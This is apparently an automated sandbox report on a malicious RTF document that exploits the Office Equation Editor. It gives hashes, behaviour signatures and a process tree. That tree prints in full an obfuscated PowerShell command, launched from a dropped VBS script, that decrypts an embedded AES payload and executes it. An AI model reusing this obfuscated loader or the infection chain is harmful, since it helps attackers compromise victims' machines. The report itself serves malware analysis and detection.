Analysis
max time kernel: 130s
max time network: 123s
platform: windows7_x64
resource: win7-20240705-en
resource tags: arch:x64 arch:x86 image:win7-20240705-en locale:en-us os:windows7-x64 system
submitted: 30-07-2024 10:03
Static task: static1
Behavioral task: behavioral1
  Sample: heistheheroofnewthingstogetmebackwithentirethingstogetbackunderstarndeverytingbetterwithworkingmodel.rtf
  Resource: win7-20240705-en
Behavioral task: behavioral2
  Sample: heistheheroofnewthingstogetmebackwithentirethingstogetbackunderstarndeverytingbetterwithworkingmodel.rtf
  Resource: win10v2004-20240709-en
General
Target: heistheheroofnewthingstogetmebackwithentirethingstogetbackunderstarndeverytingbetterwithworkingmodel.rtf
Size: 94KB
MD5: f7c34c11bb5d9cdcece78edae0beff42
SHA1: 96f2510fbb5c6203e21ead4dd55daaab59a86f4e
SHA256: 112181241c7cb66758507fdce08e40069efa3e82bedb39eb98c833e5291109d3
SHA512: 9b733c0d88c98adfe48e45079276ff7e059540445aa576b9eb637ac5c6881586336740384d71ab8a98e24b6f13c76d2ad88dd4437077dabd6a8d7829cd037164
SSDEEP: 768:GS6MQ5k2WKcczrYFUoNVEbHfwFclPY49Ug+:tSWKccXYtclPYaA
Malware Config
Signatures
- Blocklisted process makes network request (2 IoCs)
  Processes:
    flow  pid   process
    4     2092  EQNEDT32.EXE
    5     2768  powershell.exe
- Drops file in System32 directory (1 IoC)
  Processes:
    process: powershell.exe
    description: File opened for modification
    ioc: C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
- Drops file in Windows directory (1 IoC)
  Processes:
    process: WINWORD.EXE
    description: File opened for modification
    ioc: C:\Windows\Debug\WIA\wiatrace.log
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- System Location Discovery: System Language Discovery (1 TTP, 4 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  Processes:
    description  ioc                                                         process
    Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  WINWORD.EXE
    Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  EQNEDT32.EXE
    Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  WScript.exe
    Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
- Office loads VBA resources, possible macro or embedded object present
- Launches Equation Editor (1 TTP, 1 IoC)
  Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
- Suspicious behavior: AddClipboardFormatListener (1 IoC)
  Processes:
    pid   process
    2504  WINWORD.EXE
- Suspicious behavior: EnumeratesProcesses (1 IoC)
  Processes:
    pid   process
    2768  powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes:
    description              pid   process
    Token: SeDebugPrivilege  2768  powershell.exe
- Suspicious use of SetWindowsHookEx (2 IoCs)
  Processes:
    pid   process
    2504  WINWORD.EXE
    2504  WINWORD.EXE
- Suspicious use of WriteProcessMemory (12 IoCs)
  Processes:
    description                        pid   process       target process
    PID 2092 wrote to memory of 2872   2092  EQNEDT32.EXE  WScript.exe
    PID 2092 wrote to memory of 2872   2092  EQNEDT32.EXE  WScript.exe
    PID 2092 wrote to memory of 2872   2092  EQNEDT32.EXE  WScript.exe
    PID 2092 wrote to memory of 2872   2092  EQNEDT32.EXE  WScript.exe
    PID 2872 wrote to memory of 2768   2872  WScript.exe   powershell.exe
    PID 2872 wrote to memory of 2768   2872  WScript.exe   powershell.exe
    PID 2872 wrote to memory of 2768   2872  WScript.exe   powershell.exe
    PID 2872 wrote to memory of 2768   2872  WScript.exe   powershell.exe
    PID 2504 wrote to memory of 2108   2504  WINWORD.EXE   splwow64.exe
    PID 2504 wrote to memory of 2108   2504  WINWORD.EXE   splwow64.exe
    PID 2504 wrote to memory of 2108   2504  WINWORD.EXE   splwow64.exe
    PID 2504 wrote to memory of 2108   2504  WINWORD.EXE   splwow64.exe
Processes
- C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE (PID 2504, depth 1)
  Command line: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\heistheheroofnewthingstogetmebackwithentirethingstogetbackunderstarndeverytingbetterwithworkingmodel.rtf"
  Signatures:
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
  - C:\Windows\splwow64.exe (PID 2108, depth 2)
    Command line: C:\Windows\splwow64.exe 12288
- C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE (PID 2092, depth 1)
  Command line: "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
  Signatures:
    - Blocklisted process makes network request
    - System Location Discovery: System Language Discovery
    - Launches Equation Editor
    - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WScript.exe (PID 2872, depth 2)
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seemsitsgreattoreleasethedargon.vBS"
    Signatures:
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2768, depth 3)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI78788979119683530985530790090406CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'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CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
      Signatures:
        - Blocklisted process makes network request
        - Command and Scripting Interpreter: PowerShell
        - Drops file in System32 directory
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 403KB
  MD5: 1e06a0b540d76abb6e2712fa7e37138a
  SHA1: 1e7a793fe2bcd27f2757969043cdf5f5231e977e
  SHA256: 7d9be9418bca7c307c7fed9ab4ad56058363ee8ad59ae401cfdbcbea7ff252e9
  SHA512: 2b7cde726ee68b9d1cfa24c4413ebf5ab9f026b758d7cc4b6d9c6ad4eaf4b626abdde06e55d529ff2092e06f16dc8f86df935db118727733b1cd6c7284a5184a